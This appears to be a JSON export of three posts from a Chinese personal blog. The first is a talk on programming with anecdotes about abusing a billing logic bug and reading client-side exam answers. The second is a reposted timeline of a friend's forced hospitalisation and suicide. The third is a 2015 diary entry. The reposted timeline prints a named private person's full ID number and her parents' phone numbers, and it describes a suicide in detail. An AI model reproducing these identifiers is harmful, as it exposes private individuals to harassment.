除了逻辑设计，还有算法设计。我们再举一个例子：如果说我们在设计程序时需要用到质数，比如需要列出1到1000之内的所有质数。那么我们用什么方法更好呢？首先根据质数的定义，质数是一个不会被除了1和它本身的数所整除的数字，而且质数不包括1。那么接下来设计起来就很简单了，只要让当前数字不停的除以除它和1之外的在1到这个数字之间的所有数字就可以了。这很好，但是速度很慢。可能这样算1000以内的所有质数还不算太慢，那如果是10万以内呢？这得算多长时间啊……所以我们要对算法进行优化。我们知道，合数有一个特点，任何一个合数一定是由比它小的质数相乘得出的，那么接下来，我们可以这样筛选合数，首先我们算出第一个质数，在算第二个数时只要和之前算过的质数相除，能除尽就是合数，除不尽就是质数。这样是不是计算量一下就大大减少了呢？但是这还不是最优化的方案，如果说我们已经知道我们要算的最大数字是多少，那么只需要除以比这个最大数字的算术平方根小的质数就够了。这样每次算的时候需要除的数字又少了一半，算起来速度就会更快了。虽然这个算法不错，但有时我们甚至不需要这个算法就可以更好的解决这个问题。因为我说的是列出1到1000之内的所有质数，这个数字又不是很多，那么我们可以提前算好，这样就可以更快的解决问题了，这样的操作我们叫它预计算（Precomputed）。  程序设计是一个很严谨的事情，每一个方面都需要做到最好。但是人无完人，总有我们想不到的地方。尤其是计算机安全方面的事情，总有你想不到的地方，总有别人比你多想的地方，正是因为这样，才会出现黑客这样的人。这里我仍然用举例子的方式为大家展示程序设计的漏洞：我最早发现的网站漏洞似乎是在一个主机商的网站上看见的。由于一个很偶然的原因，我看到了那个主机商，而那时我正好想建一个网站，然后就在那个网站上注册了一个账号。那个主机商正好在搞活动，好像是买主机可以给你便宜5块钱，而账号初始上也有5块钱，主机最便宜的每个月也要30块钱。然后我想了想，要不然我干脆买上0.1个月的主机吧，0.1个月应该是3块钱，我应该能付的起。于是我在购买里输入了0.1，当然结果是失败的，它不能让你买小数或者是负数之类的月数。但是我返回来惊奇的发现，我的账户里居然多出来了5块钱，我想了想，它应该是对我的账户上减去了0-5元钱，毕竟是在搞活动，然后算一下5-(-5)=10。这个好啊，我感觉我可以免费得到那个主机商的主机了。于是我通过这个BUG买了1年的主机，居然成功了。当然在大约10天后被发现了，账户也被封禁了。通过这个例子我们应该明白，不要相信任何用户输入的数据，还好我仅仅是用这个漏洞买主机，很明显，这个漏洞甚至可以通过SQL注入之类的东西破坏他们的主机系统。不过这个例子似乎离日常生活有点远，那么接下来我再说一个近一点的事情：在几周前，我们不是进行了禁毒考试吗？我看了一下那个网站，很明显是一个宁夏的网站公司包办的东西。一看就知道是一个做的很不认真的网站。我在答题前看了一下源代码，发现它在批阅卷子时先在本机批一遍，只有成绩大于60分时才会把答题数据传到服务器中再批一遍。这样确实可以有效的减小网站的负载，但是这不就把答案也下载到本机上了么……于是我照着答案就在禁毒考试中得了A。这个例子又告诉了我们什么呢？就是不要将不应该让用户看到的东西下载到客户端中。 总的来说，做一个程序并不复杂，但是做一个逻辑严谨，界面美观而易用的好程序就没那么简单了。设计师在设计时需要考虑各种各样方面的东西来让用户用的舒服，又要想尽各种办法防止整个程序出现奇奇怪怪的BUG。这也就是为什么说写程序很难了。但是我希望大家听完这个讲座后能改变对写程序的看法，它看起来很复杂，但是只要仔细思考，就能解决一切问题。  以上就是我对编程以及设计的看法，也许语句中有不通顺之处，请大家谅解；如果有不对的地方，欢迎大家批评指正。  最后，谢谢大家前来听我的演讲，谢谢大家对我的支持与信任，本次演讲结束。" },{ "title": "(转)关于Neko与羽毛的记录", "category": "", "tags": "Neko, 羽毛", "url": "/2018/03/26/neko.html", "date": "2018/03/26", "content": "序：吸取经验，为了每一个人的明天。  如果有一天我消失了，我想我是死在为自由而战的冲锋路上， 而这不是一个人的悲剧。  ——亚伦斯沃茨（待续）张千叶发布的想法的时间轴  2018-03-14 02:52 张千叶在知乎上发表了想法          先要咨询一个问题我的朋友 @Ayaka Neko 在火车站被父母带走了。其父母原因是要将其带回云南老家住院，而其本人倾向于去北京的医院。其中 @Ayaka Neko 已经成年，并且上精卫和北六没有给出住院意见（开了文拉法辛）我上前争辩的时候被其父亲诬陷为协助自杀，但实际上当事人称其药量都是正常并且自愿服用，我（未成年）争辩几\t句之后遭到殴打导致眼角出血，整个过程警察在场，因为赶火车没能走流程。那么，已经父母有权利强制将已经成年的子女带回家/住院吗？有权利殴打未成年人吗？我选择不走流程的情况下可否让监护人代为走流程？现在我与她已经没有联系方式，其父母关掉了通话，一个关机一个只有留言，当事人手机遗失。她曾经口头说过与其父断绝关系，并且其父承认（在做 CT 扫描和其他医疗费用的时候拒绝支付，也未支付生活费）。那么现在该怎么办？怎么帮到她呢？需要上法庭吗？        03-14 03:01 张千叶回复          个人建议报警      现在是我不清楚行踪，原本是我们去保定，但是她没有上车，所以我不清楚怎么弄。另外这个算是用什么理由报警呢？我眼角的伤不是很重，留了点血的程度。我还可以补充的是他家庭是离异家庭，离婚协议中监护权归属于其母，但是据一个未公开/不明的协议，转给了他爸爸（不确定）。她有社交恐惧和一些人格障碍所以很依赖我，我很担心。现在是，我以什么理由报警？其父曾说过这是我们家的事情你就不要管这行的话，并且态度极其差。        03-14 03:04 补充          还可以补充的是有一次换药反应过大打了 120，我先打的其父电话，她父亲第一反应是诈骗，然后她用云南家乡话和特有的称呼说是她，其父称 「我没这义务」 救护车和毒理化验都是我和朋友垫付，从头到尾没有任何支付的意愿。        03-14 19:34 bc          通过我的父母和 Ayaka Neko的父母的交谈得知她被带回云南省红河哈尼族彝族自治州个旧市，而不是双方与警官所协商的去上海市精神卫生中心做检查。想哭。        03-14 20:03          现在说一下，有人证，有警官协商录音，还有医院处方单+支付宝记录（能看出来不是其父亲付款）大家看看还要啥呢        03-14 23:18          先说一下吧，我个人，除开 Neko 家庭问题。在 Neko 被夹走的时候我阻拦了一下，然后被揪住头发一拳打中右眼，现在右眼左眼睑发炎并且右眼视力下降严重，然后一脚踢中我肾左右的部位并让我疼了一天，明天去医院做一下鉴定看看。        3-15 11:48 bc          暂时联系上了，不清楚情况。我目前在医院。        3-15 15:35          目前准备到的是法医拍照，当时伤口的照片，三名证人，以及全家的录像和警察执法记录仪的录像。        3-15 22:10          我联系上 @Ayaka Neko了。目前她因为文拉法辛的戒断反应在医院，出院之后应该就没事了……好想她。好想她啊……        03-16 02:23          现在 @Ayaka Neko因为文拉法辛戒断（其父母未携带）被送往昆明急救，据称要做 MECT 和 MRI，具体情况看起来还好，开放病房。        03-16 09:11          联系不上。正在打医院的号码。        03-16 10:24          查看图片 附张图，已在法医拍照并鉴定。        03-16 13:46          然后现在被他父亲威胁可能被打。还说什么地头蛇之类的。        03-16 13:48          貌似是个房地产商，有什么建议么？        03-17 01:00          到达医院，这里像看守所        03-17 11:15          扑空了，她被父母提前出院了……        03-17 左右          我有她本人的姓名身份证，她手机丢失。她父母亲和姑姑的电话，被拉黑。知道她有两个家庭住址，但是在两个城市。目前她帐号一小时上一次，只读消息不回复，怀疑不是本人。现在不知道怎么做了。        03-18 左右          报警之后警察表示也打不通，并且不受理案件。律师建议去住址寻找。      ……      求助中心电话能给一下吗。她之前答应我两个星期的。也是我最大的努力了吧……      ……      说明了，警察说就算是成年人也可以被父母强制带走。管不了      ……      他们说。只要有抑郁症，任何程度的，不论开不开那个无行为能力证明，父母都可以带走/入院        03-18 00:24          强制传唤证人居然不包括被告子女…        03-18 16:35          彻底找不到了啊……彻底断了啊……        03-17 21:09          我这边说下…报案测试过了，只要他们知道带走的是监护人就不会管，并如果得知有抑郁症的话更不会管…已经对警方感到绝望了。        03-19 左右          警方认为抑郁症病人不算完全行为能力的样子，并且认为她在父母身边绝对安全      ……      直接报案：对方是监护人有权带走说明情况：对方还有抑郁症呢，监护人当然能带走了        03-20 15:03          右眼已经报废。        03-20 22:45          其实算个好消息？右眼视力看不清之后可以考虑戴个眼罩或者换个玻璃珠？      ……      视力基本为零～医生建议戴眼镜        03-23 23:13 之前一段时间，可能是23:06 已被删除，已保存到wayback          那就把这里当成最后一点希望了吧。@Ayaka Neko张恩辅 532501199903240612 被她父亲张竣于三月十六日凌晨一点入住了云南心理卫生中心，并之后被带走目前最后已知地点/消息为云南昆明安宁市好孩子三生教育培训学校。她手机处于丢失状态。其父母拒绝联系…她父亲联系方式为 ‭13888320678‬ 母亲为 ‭13887310860‬ 尝试过报警了…没什么用呢。我也做不到什么了呢。如果需要更多资料可以私信我如果我还活着的话。        03-24 17:30          Ayaka Neko自杀了。        03-24 17:34          Ayaka Neko今天下午两点三十四分，抢救无效死亡      轻伤二级。视力严重下降，加鼻骨骨折。视力从 1.0 到三百五十度近视。        03-26 下午11点左右\t樊郕 回复一位在想法下留言的用户          我是她的家人，我是她的妹妹，她有严重的抑郁症，且每天过量服药，雌性激素和抗焦虑的药，这个你们知道?送去医院是为了让她不要吃药，还有心理辅导，面子?你并不是其中的人，不知道有多痛苦，请不要站着说话不腰疼，也不要妄自揣测，更不要当键盘侠，谢谢      温柔——热点扩散  03-24 17:43今天向我求助的张恩辅同学，现已离世。。内容已删除，快照里看出在20分钟内有69条评论和230个赞。          通过朋友向我求助 @Ayaka Neko 张恩辅同学现已离世，刚刚和她妈妈通过电话，她在家中自杀，抢救无效结束了自己的生命。      对不起，我没能帮到她，没能把她救出来。      我应该早一些看到的，如果再早些报警的话，可能就不会闹到这种地步。      我们也不能冤枉任何一个好人，安宁市好孩子教育学校是一所正规的学校，没有接收张恩辅同学，她是回到家里才做的这一切。      我也没办法再苛责她那几乎哭到失声的母亲，和她的父亲。      只能够说，这是家庭教育和沟通不足导致的悲剧，每一个父母一定要尊重孩子的意愿，并耐心和孩子沟通，强硬的暴力、训斥会影响到孩子们的身心健康，甚至会发生比如现在这样的悲剧。      请各位家长们一定要引以为戒！      （完）      明天我会整理一下，把这件事的经过写出来，希望能够纪录下来这一切。      张恩辅同学，这个世界对你太不公平了，真的非常对不起，我知道的太晚了，如果我再早一些知道，再早一些采取措施，说不定就能救你出来，真的很对不起。        19:13希望这场悲剧能让家长们引以为戒，请尊重孩子！（未完待续）注： 源地址：https://gledos.science/neko.html Neko的博客：https://neko.ayaka.moe/ 备份：https://github.com/nekomeowww/nekomeowww.github.io 羽毛的博客：https://oao.moe/   解析IP:45.32.10.83 备份：https://github.com/zhangyubaka/zhangyubaka.github.io" },{ "title": "2015.2.23日记", "category": "", "tags": "日记", "url": "/2015/02/23/diary.html", "date": "2015/02/23", "content": "今天是2015年2月23日，离开学还有5天 今天我修好了我的U盘，之前我的U盘在一个太阳黑子盛发的时期坏掉了，我感到十分难过，于是写了一篇议论文和短篇小说纪念它，然后就半坏半好的用。就在今天，我去了我大伯家，发现我的U盘中那个坏掉了的那个文件夹突然能读了，这还是那个王哥哥的功劳呢，如果不是我展示我U盘坏掉的情况，我还不知道我的U盘竟不自动断线了。于是我使用了CHKDSK修复了我的U盘，结果所有问题解决了。就是留下了一个不知名的文件i怎么也删不掉。 昨天我打算玩爷爷的电脑，结果打不开，于是我在今天看了看电脑，拿下来一通电，结果可以启动了。然后我很高兴，安上后，一打开显示器又不能用了，于是我猜这是显卡的问题，然后我关了显示器，打开了电脑后又开了显示器，结果好了，于是我就在这台电脑写了我今天的日记。快开学了，我写一个假期小结 这个假期一共30天，去了4个城市，对手机的了解更深了。比如partition（分区），mount（挂载），prop（设置变量）。而且我还因此弄坏了手机。在2015年的2月18日。我以错误的方式挂载了boot分区，结果……boot分区被我玩坏了。手机是靠boot分区进行启动的，结果我还脑残的重启了。于是，在2015年的春节，我一整天都想着我的手机。终于在春节的下午，我去了二姨家，使用了电脑，花了10秒修好了手机。于是，我知道了mount是个危险命令。不过在弄坏手机之前我还做了一件事，那就是在手机上装windows3.2中文版，这是第一个推广到中国的windows系统。首先我装了DOSBOX，模拟DOS环境，然后在这个上面安了CCED，并正常的运行了，我很高兴。然后在手机上下载了win3.2系统的安装包，没有电脑的帮助安装了win3.2，证明了电脑就是一垃圾，便携式手持设备才是信息的未来，于是我就弄坏了手机，证明失败了……虽然我没去旅游，但我这个假期还是很有意思的。" }]